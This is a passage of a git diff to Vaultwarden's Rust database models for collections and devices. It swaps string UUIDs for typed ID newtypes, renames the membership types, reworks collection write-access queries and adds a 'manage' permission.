-        Self::find_by_user_uuid(user_uuid.to_owned(), conn).await.into_iter().any(|c| c.uuid == collection_uuid)
-    }
-
-    pub async fn find_by_organization_and_user_uuid(org_uuid: &str, user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    ) -> Vec<Self> {
         Self::find_by_user_uuid(user_uuid.to_owned(), conn)
             .await
             .into_iter()
-            .filter(|c| c.org_uuid == org_uuid)
+            .filter(|c| &c.org_uuid == org_uuid)
             .collect()
     }
 
-    pub async fn find_by_organization(org_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             collections::table
                 .filter(collections::org_uuid.eq(org_uuid))
@@ -281,7 +313,7 @@ impl Collection {
         }}
     }
 
-    pub async fn count_by_org(org_uuid: &str, conn: &mut DbConn) -> i64 {
+    pub async fn count_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
         db_run! { conn: {
             collections::table
                 .filter(collections::org_uuid.eq(org_uuid))
@@ -292,7 +324,11 @@ impl Collection {
         }}
     }
 
-    pub async fn find_by_uuid_and_org(uuid: &str, org_uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid_and_org(
+        uuid: &CollectionId,
+        org_uuid: &OrganizationId,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
         db_run! { conn: {
             collections::table
                 .filter(collections::uuid.eq(uuid))
@@ -304,7 +340,7 @@ impl Collection {
         }}
     }
 
-    pub async fn find_by_uuid_and_user(uuid: &str, user_uuid: String, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid_and_user(uuid: &CollectionId, user_uuid: UserId, conn: &mut DbConn) -> Option<Self> {
         if CONFIG.org_groups_enabled() {
             db_run! { conn: {
                 collections::table
@@ -333,7 +369,7 @@ impl Collection {
                 .filter(
                     users_collections::collection_uuid.eq(uuid).or( // Directly accessed collection
                         users_organizations::access_all.eq(true).or( // access_all in Organization
-                            users_organizations::atype.le(UserOrgType::Admin as i32) // Org admin or owner
+                            users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
                         )).or(
                             groups::access_all.eq(true) // access_all in groups
                         ).or( // access via groups
@@ -362,7 +398,7 @@ impl Collection {
                 .filter(
                     users_collections::collection_uuid.eq(uuid).or( // Directly accessed collection
                         users_organizations::access_all.eq(true).or( // access_all in Organization
-                            users_organizations::atype.le(UserOrgType::Admin as i32) // Org admin or owner
+                            users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
                         ))
                 ).select(collections::all_columns)
                 .first::<CollectionDb>(conn).ok()
@@ -371,53 +407,69 @@ impl Collection {
         }
     }
 
-    pub async fn is_writable_by_user(&self, user_uuid: &str, conn: &mut DbConn) -> bool {
+    pub async fn is_writable_by_user(&self, user_uuid: &UserId, conn: &mut DbConn) -> bool {
         let user_uuid = user_uuid.to_string();
-        db_run! { conn: {
-            collections::table
-            .left_join(users_collections::table.on(
-                users_collections::collection_uuid.eq(collections::uuid).and(
-                    users_collections::user_uuid.eq(user_uuid.clone())
-                )
-            ))
-            .left_join(users_organizations::table.on(
-                collections::org_uuid.eq(users_organizations::org_uuid).and(
-                    users_organizations::user_uuid.eq(user_uuid)
-                )
-            ))
+        if CONFIG.org_groups_enabled() {
+            db_run! { conn: {
+                collections::table
+                .filter(collections::uuid.eq(&self.uuid))
+                .inner_join(users_organizations::table.on(
+                    collections::org_uuid.eq(users_organizations::org_uuid)
+                    .and(users_organizations::user_uuid.eq(user_uuid.clone()))
+                ))
+                .left_join(users_collections::table.on(
+                    users_collections::collection_uuid.eq(collections::uuid)
+                    .and(users_collections::user_uuid.eq(user_uuid))
+                ))
             .left_join(groups_users::table.on(
                 groups_users::users_organizations_uuid.eq(users_organizations::uuid)
             ))
             .left_join(groups::table.on(
                 groups::uuid.eq(groups_users::groups_uuid)
             ))
            .left_join(collections_groups::table.on(
                collections_groups::groups_uuid.eq(groups_users::groups_uuid).and(
|
collections_groups::groups_uuid.eq(groups_users::groups_uuid)
|
||||||
collections_groups::collections_uuid.eq(collections::uuid)
|
.and(collections_groups::collections_uuid.eq(collections::uuid))
|
||||||
)
|
))
|
||||||
))
|
.filter(users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
.filter(collections::uuid.eq(&self.uuid))
|
.or(users_organizations::access_all.eq(true)) // access_all via membership
|
||||||
.filter(
|
.or(users_collections::collection_uuid.eq(&self.uuid) // write access given to collection
|
||||||
users_collections::collection_uuid.eq(&self.uuid).and(users_collections::read_only.eq(false)).or(// Directly accessed collection
|
.and(users_collections::read_only.eq(false)))
|
||||||
users_organizations::access_all.eq(true).or( // access_all in Organization
|
.or(groups::access_all.eq(true)) // access_all via group
|
||||||
users_organizations::atype.le(UserOrgType::Admin as i32) // Org admin or owner
|
.or(collections_groups::collections_uuid.is_not_null() // write access given via group
|
||||||
)).or(
|
.and(collections_groups::read_only.eq(false)))
|
||||||
groups::access_all.eq(true) // access_all in groups
|
|
||||||
).or( // access via groups
|
|
||||||
groups_users::users_organizations_uuid.eq(users_organizations::uuid).and(
|
|
||||||
collections_groups::collections_uuid.is_not_null().and(
|
|
||||||
collections_groups::read_only.eq(false))
|
|
||||||
)
|
)
|
||||||
)
|
.count()
|
||||||
)
|
.first::<i64>(conn)
|
||||||
.count()
|
.ok()
|
||||||
.first::<i64>(conn)
|
.unwrap_or(0) != 0
|
||||||
.ok()
|
}}
|
||||||
.unwrap_or(0) != 0
|
} else {
|
||||||
}}
|
db_run! { conn: {
|
||||||
|
collections::table
|
||||||
|
.filter(collections::uuid.eq(&self.uuid))
|
||||||
|
.inner_join(users_organizations::table.on(
|
||||||
|
collections::org_uuid.eq(users_organizations::org_uuid)
|
||||||
|
.and(users_organizations::user_uuid.eq(user_uuid.clone()))
|
||||||
|
))
|
||||||
|
.left_join(users_collections::table.on(
|
||||||
|
users_collections::collection_uuid.eq(collections::uuid)
|
||||||
|
.and(users_collections::user_uuid.eq(user_uuid))
|
||||||
|
))
|
||||||
|
.filter(users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
|
.or(users_organizations::access_all.eq(true)) // access_all via membership
|
||||||
|
.or(users_collections::collection_uuid.eq(&self.uuid) // write access given to collection
|
||||||
|
.and(users_collections::read_only.eq(false)))
|
||||||
|
)
|
||||||
|
.count()
|
||||||
|
.first::<i64>(conn)
|
||||||
|
.ok()
|
||||||
|
.unwrap_or(0) != 0
|
||||||
|
}}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn hide_passwords_for_user(&self, user_uuid: &str, conn: &mut DbConn) -> bool {
|
pub async fn hide_passwords_for_user(&self, user_uuid: &UserId, conn: &mut DbConn) -> bool {
|
||||||
let user_uuid = user_uuid.to_string();
|
let user_uuid = user_uuid.to_string();
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections::table
|
collections::table
|
||||||
@@ -446,7 +498,7 @@ impl Collection {
|
|||||||
.filter(
|
.filter(
|
||||||
users_collections::collection_uuid.eq(&self.uuid).and(users_collections::hide_passwords.eq(true)).or(// Directly accessed collection
|
users_collections::collection_uuid.eq(&self.uuid).and(users_collections::hide_passwords.eq(true)).or(// Directly accessed collection
|
||||||
users_organizations::access_all.eq(true).or( // access_all in Organization
|
users_organizations::access_all.eq(true).or( // access_all in Organization
|
||||||
users_organizations::atype.le(UserOrgType::Admin as i32) // Org admin or owner
|
users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
)).or(
|
)).or(
|
||||||
groups::access_all.eq(true) // access_all in groups
|
groups::access_all.eq(true) // access_all in groups
|
||||||
).or( // access via groups
|
).or( // access via groups
|
||||||
@@ -462,11 +514,61 @@ impl Collection {
|
|||||||
.unwrap_or(0) != 0
|
.unwrap_or(0) != 0
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn is_manageable_by_user(&self, user_uuid: &UserId, conn: &mut DbConn) -> bool {
|
||||||
|
let user_uuid = user_uuid.to_string();
|
||||||
|
db_run! { conn: {
|
||||||
|
collections::table
|
||||||
|
.left_join(users_collections::table.on(
|
||||||
|
users_collections::collection_uuid.eq(collections::uuid).and(
|
||||||
|
users_collections::user_uuid.eq(user_uuid.clone())
|
||||||
|
)
|
||||||
|
))
|
||||||
|
.left_join(users_organizations::table.on(
|
||||||
|
collections::org_uuid.eq(users_organizations::org_uuid).and(
|
||||||
|
users_organizations::user_uuid.eq(user_uuid)
|
||||||
|
)
|
||||||
|
))
|
||||||
|
.left_join(groups_users::table.on(
|
||||||
|
groups_users::users_organizations_uuid.eq(users_organizations::uuid)
|
||||||
|
))
|
||||||
|
.left_join(groups::table.on(
|
||||||
|
groups::uuid.eq(groups_users::groups_uuid)
|
||||||
|
))
|
||||||
|
.left_join(collections_groups::table.on(
|
||||||
|
collections_groups::groups_uuid.eq(groups_users::groups_uuid).and(
|
||||||
|
collections_groups::collections_uuid.eq(collections::uuid)
|
||||||
|
)
|
||||||
|
))
|
||||||
|
.filter(collections::uuid.eq(&self.uuid))
|
||||||
|
.filter(
|
||||||
|
users_collections::collection_uuid.eq(&self.uuid).and(users_collections::manage.eq(true)).or(// Directly accessed collection
|
||||||
|
users_organizations::access_all.eq(true).or( // access_all in Organization
|
||||||
|
users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
|
)).or(
|
||||||
|
groups::access_all.eq(true) // access_all in groups
|
||||||
|
).or( // access via groups
|
||||||
|
groups_users::users_organizations_uuid.eq(users_organizations::uuid).and(
|
||||||
|
collections_groups::collections_uuid.is_not_null().and(
|
||||||
|
collections_groups::manage.eq(true))
|
||||||
|
)
|
||||||
|
)
|
||||||
|
)
|
||||||
|
.count()
|
||||||
|
.first::<i64>(conn)
|
||||||
|
.ok()
|
||||||
|
.unwrap_or(0) != 0
|
||||||
|
}}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Database methods
|
/// Database methods
|
||||||
impl CollectionUser {
|
impl CollectionUser {
|
||||||
pub async fn find_by_organization_and_user_uuid(org_uuid: &str, user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_organization_and_user_uuid(
|
||||||
|
org_uuid: &OrganizationId,
|
||||||
|
user_uuid: &UserId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.filter(users_collections::user_uuid.eq(user_uuid))
|
.filter(users_collections::user_uuid.eq(user_uuid))
|
||||||
@@ -479,24 +581,30 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_organization(org_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_organization_swap_user_uuid_with_member_uuid(
|
||||||
db_run! { conn: {
|
org_uuid: &OrganizationId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Vec<CollectionMembership> {
|
||||||
|
let col_users = db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.inner_join(collections::table.on(collections::uuid.eq(users_collections::collection_uuid)))
|
.inner_join(collections::table.on(collections::uuid.eq(users_collections::collection_uuid)))
|
||||||
.filter(collections::org_uuid.eq(org_uuid))
|
.filter(collections::org_uuid.eq(org_uuid))
|
||||||
.inner_join(users_organizations::table.on(users_organizations::user_uuid.eq(users_collections::user_uuid)))
|
.inner_join(users_organizations::table.on(users_organizations::user_uuid.eq(users_collections::user_uuid)))
|
||||||
.select((users_organizations::uuid, users_collections::collection_uuid, users_collections::read_only, users_collections::hide_passwords))
|
.filter(users_organizations::org_uuid.eq(org_uuid))
|
||||||
|
.select((users_organizations::uuid, users_collections::collection_uuid, users_collections::read_only, users_collections::hide_passwords, users_collections::manage))
|
||||||
.load::<CollectionUserDb>(conn)
|
.load::<CollectionUserDb>(conn)
|
||||||
.expect("Error loading users_collections")
|
.expect("Error loading users_collections")
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}};
|
||||||
|
col_users.into_iter().map(|c| c.into()).collect()
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn save(
|
pub async fn save(
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
collection_uuid: &str,
|
collection_uuid: &CollectionId,
|
||||||
read_only: bool,
|
read_only: bool,
|
||||||
hide_passwords: bool,
|
hide_passwords: bool,
|
||||||
|
manage: bool,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
User::update_uuid_revision(user_uuid, conn).await;
|
User::update_uuid_revision(user_uuid, conn).await;
|
||||||
@@ -509,6 +617,7 @@ impl CollectionUser {
|
|||||||
users_collections::collection_uuid.eq(collection_uuid),
|
users_collections::collection_uuid.eq(collection_uuid),
|
||||||
users_collections::read_only.eq(read_only),
|
users_collections::read_only.eq(read_only),
|
||||||
users_collections::hide_passwords.eq(hide_passwords),
|
users_collections::hide_passwords.eq(hide_passwords),
|
||||||
|
users_collections::manage.eq(manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
{
|
{
|
||||||
@@ -523,6 +632,7 @@ impl CollectionUser {
|
|||||||
users_collections::collection_uuid.eq(collection_uuid),
|
users_collections::collection_uuid.eq(collection_uuid),
|
||||||
users_collections::read_only.eq(read_only),
|
users_collections::read_only.eq(read_only),
|
||||||
users_collections::hide_passwords.eq(hide_passwords),
|
users_collections::hide_passwords.eq(hide_passwords),
|
||||||
|
users_collections::manage.eq(manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error adding user to collection")
|
.map_res("Error adding user to collection")
|
||||||
@@ -537,12 +647,14 @@ impl CollectionUser {
|
|||||||
users_collections::collection_uuid.eq(collection_uuid),
|
users_collections::collection_uuid.eq(collection_uuid),
|
||||||
users_collections::read_only.eq(read_only),
|
users_collections::read_only.eq(read_only),
|
||||||
users_collections::hide_passwords.eq(hide_passwords),
|
users_collections::hide_passwords.eq(hide_passwords),
|
||||||
|
users_collections::manage.eq(manage),
|
||||||
))
|
))
|
||||||
.on_conflict((users_collections::user_uuid, users_collections::collection_uuid))
|
.on_conflict((users_collections::user_uuid, users_collections::collection_uuid))
|
||||||
.do_update()
|
.do_update()
|
||||||
.set((
|
.set((
|
||||||
users_collections::read_only.eq(read_only),
|
users_collections::read_only.eq(read_only),
|
||||||
users_collections::hide_passwords.eq(hide_passwords),
|
users_collections::hide_passwords.eq(hide_passwords),
|
||||||
|
users_collections::manage.eq(manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error adding user to collection")
|
.map_res("Error adding user to collection")
|
||||||
@@ -564,7 +676,7 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_collection(collection_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.filter(users_collections::collection_uuid.eq(collection_uuid))
|
.filter(users_collections::collection_uuid.eq(collection_uuid))
|
||||||
@@ -575,24 +687,27 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_collection_swap_user_uuid_with_org_user_uuid(
|
pub async fn find_by_org_and_coll_swap_user_uuid_with_member_uuid(
|
||||||
collection_uuid: &str,
|
org_uuid: &OrganizationId,
|
||||||
|
collection_uuid: &CollectionId,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Vec<Self> {
|
) -> Vec<CollectionMembership> {
|
||||||
db_run! { conn: {
|
let col_users = db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.filter(users_collections::collection_uuid.eq(collection_uuid))
|
.filter(users_collections::collection_uuid.eq(collection_uuid))
|
||||||
|
.filter(users_organizations::org_uuid.eq(org_uuid))
|
||||||
.inner_join(users_organizations::table.on(users_organizations::user_uuid.eq(users_collections::user_uuid)))
|
.inner_join(users_organizations::table.on(users_organizations::user_uuid.eq(users_collections::user_uuid)))
|
||||||
.select((users_organizations::uuid, users_collections::collection_uuid, users_collections::read_only, users_collections::hide_passwords))
|
.select((users_organizations::uuid, users_collections::collection_uuid, users_collections::read_only, users_collections::hide_passwords, users_collections::manage))
|
||||||
.load::<CollectionUserDb>(conn)
|
.load::<CollectionUserDb>(conn)
|
||||||
.expect("Error loading users_collections")
|
.expect("Error loading users_collections")
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}};
|
||||||
|
col_users.into_iter().map(|c| c.into()).collect()
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_collection_and_user(
|
pub async fn find_by_collection_and_user(
|
||||||
collection_uuid: &str,
|
collection_uuid: &CollectionId,
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Option<Self> {
|
) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
@@ -606,7 +721,7 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.filter(users_collections::user_uuid.eq(user_uuid))
|
.filter(users_collections::user_uuid.eq(user_uuid))
|
||||||
@@ -617,7 +732,7 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_collection(collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
for collection in CollectionUser::find_by_collection(collection_uuid, conn).await.iter() {
|
for collection in CollectionUser::find_by_collection(collection_uuid, conn).await.iter() {
|
||||||
User::update_uuid_revision(&collection.user_uuid, conn).await;
|
User::update_uuid_revision(&collection.user_uuid, conn).await;
|
||||||
}
|
}
|
||||||
@@ -629,12 +744,16 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user_and_org(user_uuid: &str, org_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user_and_org(
|
||||||
|
user_uuid: &UserId,
|
||||||
|
org_uuid: &OrganizationId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> EmptyResult {
|
||||||
let collectionusers = Self::find_by_organization_and_user_uuid(org_uuid, user_uuid, conn).await;
|
let collectionusers = Self::find_by_organization_and_user_uuid(org_uuid, user_uuid, conn).await;
|
||||||
|
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
for user in collectionusers {
|
for user in collectionusers {
|
||||||
diesel::delete(users_collections::table.filter(
|
let _: () = diesel::delete(users_collections::table.filter(
|
||||||
users_collections::user_uuid.eq(user_uuid)
|
users_collections::user_uuid.eq(user_uuid)
|
||||||
.and(users_collections::collection_uuid.eq(user.collection_uuid))
|
.and(users_collections::collection_uuid.eq(user.collection_uuid))
|
||||||
))
|
))
|
||||||
@@ -644,11 +763,19 @@ impl CollectionUser {
|
|||||||
Ok(())
|
Ok(())
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn has_access_to_collection_by_user(
|
||||||
|
col_id: &CollectionId,
|
||||||
|
user_uuid: &UserId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> bool {
|
||||||
|
Self::find_by_collection_and_user(col_id, user_uuid, conn).await.is_some()
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Database methods
|
/// Database methods
|
||||||
impl CollectionCipher {
|
impl CollectionCipher {
|
||||||
pub async fn save(cipher_uuid: &str, collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn save(cipher_uuid: &CipherId, collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
Self::update_users_revision(collection_uuid, conn).await;
|
Self::update_users_revision(collection_uuid, conn).await;
|
||||||
|
|
||||||
db_run! { conn:
|
db_run! { conn:
|
||||||
@@ -678,7 +805,7 @@ impl CollectionCipher {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete(cipher_uuid: &str, collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete(cipher_uuid: &CipherId, collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
Self::update_users_revision(collection_uuid, conn).await;
|
Self::update_users_revision(collection_uuid, conn).await;
|
||||||
|
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
@@ -692,7 +819,7 @@ impl CollectionCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(ciphers_collections::table.filter(ciphers_collections::cipher_uuid.eq(cipher_uuid)))
|
diesel::delete(ciphers_collections::table.filter(ciphers_collections::cipher_uuid.eq(cipher_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -700,7 +827,7 @@ impl CollectionCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_collection(collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(ciphers_collections::table.filter(ciphers_collections::collection_uuid.eq(collection_uuid)))
|
diesel::delete(ciphers_collections::table.filter(ciphers_collections::collection_uuid.eq(collection_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -708,9 +835,63 @@ impl CollectionCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn update_users_revision(collection_uuid: &str, conn: &mut DbConn) {
|
pub async fn update_users_revision(collection_uuid: &CollectionId, conn: &mut DbConn) {
|
||||||
if let Some(collection) = Collection::find_by_uuid(collection_uuid, conn).await {
|
if let Some(collection) = Collection::find_by_uuid(collection_uuid, conn).await {
|
||||||
collection.update_users_revision(conn).await;
|
collection.update_users_revision(conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Added in case we need the membership_uuid instead of the user_uuid
|
||||||
|
pub struct CollectionMembership {
|
||||||
|
pub membership_uuid: MembershipId,
|
||||||
|
pub collection_uuid: CollectionId,
|
||||||
|
pub read_only: bool,
|
||||||
|
pub hide_passwords: bool,
|
||||||
|
pub manage: bool,
|
||||||
|
}
|
||||||
|
|
||||||
|
impl CollectionMembership {
|
||||||
|
pub fn to_json_details_for_member(&self, membership_type: i32) -> Value {
|
||||||
|
json!({
|
||||||
|
"id": self.membership_uuid,
|
||||||
|
"readOnly": self.read_only,
|
||||||
|
"hidePasswords": self.hide_passwords,
|
||||||
|
"manage": membership_type >= MembershipType::Admin
|
||||||
|
|| self.manage
|
||||||
|
|| (membership_type == MembershipType::Manager
|
||||||
|
&& !self.read_only
|
||||||
|
&& !self.hide_passwords),
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
impl From<CollectionUser> for CollectionMembership {
|
||||||
|
fn from(c: CollectionUser) -> Self {
|
||||||
|
Self {
|
||||||
|
membership_uuid: c.user_uuid.to_string().into(),
|
||||||
|
collection_uuid: c.collection_uuid,
|
||||||
|
read_only: c.read_only,
|
||||||
|
hide_passwords: c.hide_passwords,
|
||||||
|
manage: c.manage,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
DieselNewType,
|
||||||
|
Display,
|
||||||
|
From,
|
||||||
|
FromForm,
|
||||||
|
Hash,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
UuidFromParam,
|
||||||
|
)]
|
||||||
|
pub struct CollectionId(String);
|
||||||
|
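The dominant change in this file is replacing bare `&str`/`String` UUID parameters with dedicated newtypes such as `CollectionId`, `OrganizationId`, and `UserId`. A minimal, self-contained sketch of what that pattern buys, using plain tuple structs as stand-ins for the derived wrappers above (the `find_collection` function below is hypothetical, for illustration only):

```rust
// Simplified stand-ins for the DieselNewType wrappers introduced in the diff.
pub struct CollectionId(pub String);
pub struct OrganizationId(pub String);

// Hypothetical lookup: with bare &str arguments the two UUIDs could be
// swapped silently; with newtypes the compiler rejects the mix-up.
fn find_collection(collection: &CollectionId, org: &OrganizationId) -> bool {
    !collection.0.is_empty() && !org.0.is_empty()
}

fn main() {
    let col = CollectionId("3fa85f64-5717-4562-b3fc-2c963f66afa6".into());
    let org = OrganizationId("9b2f58a3-0000-4000-8000-000000000000".into());
    assert!(find_collection(&col, &org)); // compiles
    // find_collection(&org, &col);       // compile error: mismatched types
}
```

The `DieselNewType` derive (presumably from the `diesel-derive-newtype` crate) is what lets these wrappers still bind directly in queries such as `collections::org_uuid.eq(org_uuid)`.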
diff --git a/src/db/models/device.rs b/src/db/models/device.rs
@@ -1,7 +1,14 @@
 use chrono::{NaiveDateTime, Utc};
+use derive_more::{Display, From};
+use serde_json::Value;
 
-use crate::{crypto, CONFIG};
-use core::fmt;
+use super::{AuthRequest, UserId};
+use crate::{
+    crypto,
+    util::{format_date, get_uuid},
+    CONFIG,
+};
+use macros::{IdFromParam, UuidFromParam};
 
 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
@@ -9,26 +16,25 @@ db_object! {
     #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(uuid, user_uuid))]
     pub struct Device {
-        pub uuid: String,
+        pub uuid: DeviceId,
         pub created_at: NaiveDateTime,
         pub updated_at: NaiveDateTime,
 
-        pub user_uuid: String,
+        pub user_uuid: UserId,
 
         pub name: String,
-        pub atype: i32, // https://github.com/bitwarden/server/blob/master/src/Core/Enums/DeviceType.cs
-        pub push_uuid: Option<String>,
+        pub atype: i32, // https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/Enums/DeviceType.cs
+        pub push_uuid: Option<PushId>,
         pub push_token: Option<String>,
 
         pub refresh_token: String,
 
         pub twofactor_remember: Option<String>,
     }
 }
 
 /// Local methods
 impl Device {
-    pub fn new(uuid: String, user_uuid: String, name: String, atype: i32) -> Self {
+    pub fn new(uuid: DeviceId, user_uuid: UserId, name: String, atype: i32) -> Self {
         let now = Utc::now().naive_utc();
 
         Self {
@@ -40,13 +46,25 @@ impl Device {
             name,
             atype,
 
-            push_uuid: None,
+            push_uuid: Some(PushId(get_uuid())),
             push_token: None,
             refresh_token: String::new(),
             twofactor_remember: None,
         }
     }
 
+    pub fn to_json(&self) -> Value {
+        json!({
+            "id": self.uuid,
+            "name": self.name,
+            "type": self.atype,
+            "identifier": self.uuid,
+            "creationDate": format_date(&self.created_at),
+            "isTrusted": false,
+            "object":"device"
+        })
+    }
+
     pub fn refresh_twofactor_remember(&mut self) -> String {
         use data_encoding::BASE64;
         let twofactor_remember = crypto::encode_random_bytes::<180>(BASE64);
@@ -59,7 +77,12 @@ impl Device {
         self.twofactor_remember = None;
     }
 
-    pub fn refresh_tokens(&mut self, user: &super::User, scope: Vec<String>) -> (String, i64) {
+    pub fn refresh_tokens(
+        &mut self,
+        user: &super::User,
+        scope: Vec<String>,
+        client_id: Option<String>,
+    ) -> (String, i64) {
         // If there is no refresh token, we create one
         if self.refresh_token.is_empty() {
             use data_encoding::BASE64URL;
@@ -67,20 +90,25 @@ impl Device {
         }
 
         // Update the expiration of the device and the last update date
-        let time_now = Utc::now().naive_utc();
-        self.updated_at = time_now;
+        let time_now = Utc::now();
+        self.updated_at = time_now.naive_utc();
+
+        // Generate a random push_uuid so if it doesn't already have one
+        if self.push_uuid.is_none() {
+            self.push_uuid = Some(PushId(get_uuid()));
+        }
 
         // ---
         // Disabled these keys to be added to the JWT since they could cause the JWT to get too large
         // Also These key/value pairs are not used anywhere by either Vaultwarden or Bitwarden Clients
         // Because these might get used in the future, and they are added by the Bitwarden Server, lets keep it, but then commented out
         // ---
-        // fn arg: orgs: Vec<super::UserOrganization>,
+        // fn arg: members: Vec<super::Membership>,
         // ---
-        // let orgowner: Vec<_> = orgs.iter().filter(|o| o.atype == 0).map(|o| o.org_uuid.clone()).collect();
-        // let orgadmin: Vec<_> = orgs.iter().filter(|o| o.atype == 1).map(|o| o.org_uuid.clone()).collect();
-        // let orguser: Vec<_> = orgs.iter().filter(|o| o.atype == 2).map(|o| o.org_uuid.clone()).collect();
-        // let orgmanager: Vec<_> = orgs.iter().filter(|o| o.atype == 3).map(|o| o.org_uuid.clone()).collect();
